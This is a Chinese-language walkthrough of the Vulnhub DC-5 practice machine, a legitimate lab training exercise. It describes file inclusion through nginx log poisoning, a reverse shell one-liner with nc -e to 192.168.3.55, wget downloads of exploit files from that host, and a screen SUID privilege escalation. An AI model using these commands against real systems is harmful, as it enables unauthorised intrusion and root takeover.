Vulnhub靶机DC-5通关笔记
¶前言
下载地址:https://www.vulnhub.com/entry/dc-5,314/
¶开始
起手nmap扫描
开放了80和111端口
80端口是很简单的页面
交互的只有
thankyou.php
接着看111端口的rpc服务
都是拒绝服务的漏洞 没有什么实质的帮助
那怎么搞啊
记住做vulnhub的靶机 有一个很重要的经验就是要看下载页面的提示,虽然是英文但是可以少走很多弯路
You need to look for something a little out of the ordinary (something that changes with a refresh of a page).
在一个随着刷新会改变的页面寻找与原来不同的东西
注意到Copyright后面的数字会随着刷新的改变而改变,所以这里就是这道题的关键了
要fuzz一下
fuzz出来的结果是file=xxxx进行包含
既然可以包含那就可以包含nginx文件来getshell了
然后包含
/var/log/nginx/access.log
放入蚁剑 连接成功
反弹shell
nc -e /bin/bash 192.168.3.55 77
拿个bash好操作
python -c 'import pty;pty.spawn("/bin/bash")'
接下来的目的就是提权
sudo -l执行不了
看看SUID
find / -perm /4000 2>/dev/null
screen这个是我接触过的
用来管理多重视窗的
这个可以用来提权吗?
查一下
找到一个版本对应的本地权限提升的exp
看看具体的用法
看着exp的用法弄好
python -m SimpleHTTPServer
开启http的服务
然后用wget把我们的exp传入靶机的tmp目录
wget http://192.168.3.55:8000/libhax.so
wget http://192.168.3.55:8000/rootshell
然后跟着后面的操作
最终拿到flag
¶总结
这个靶机是做过最难的靶机 主要是因为fuzz的部分没想到 没想到藏着一个文件包含的漏洞,只要弄通了这一点后面的好解决了,但渗透的艺术就在于fuzz出一些隐藏的关键点从而攻破整个系统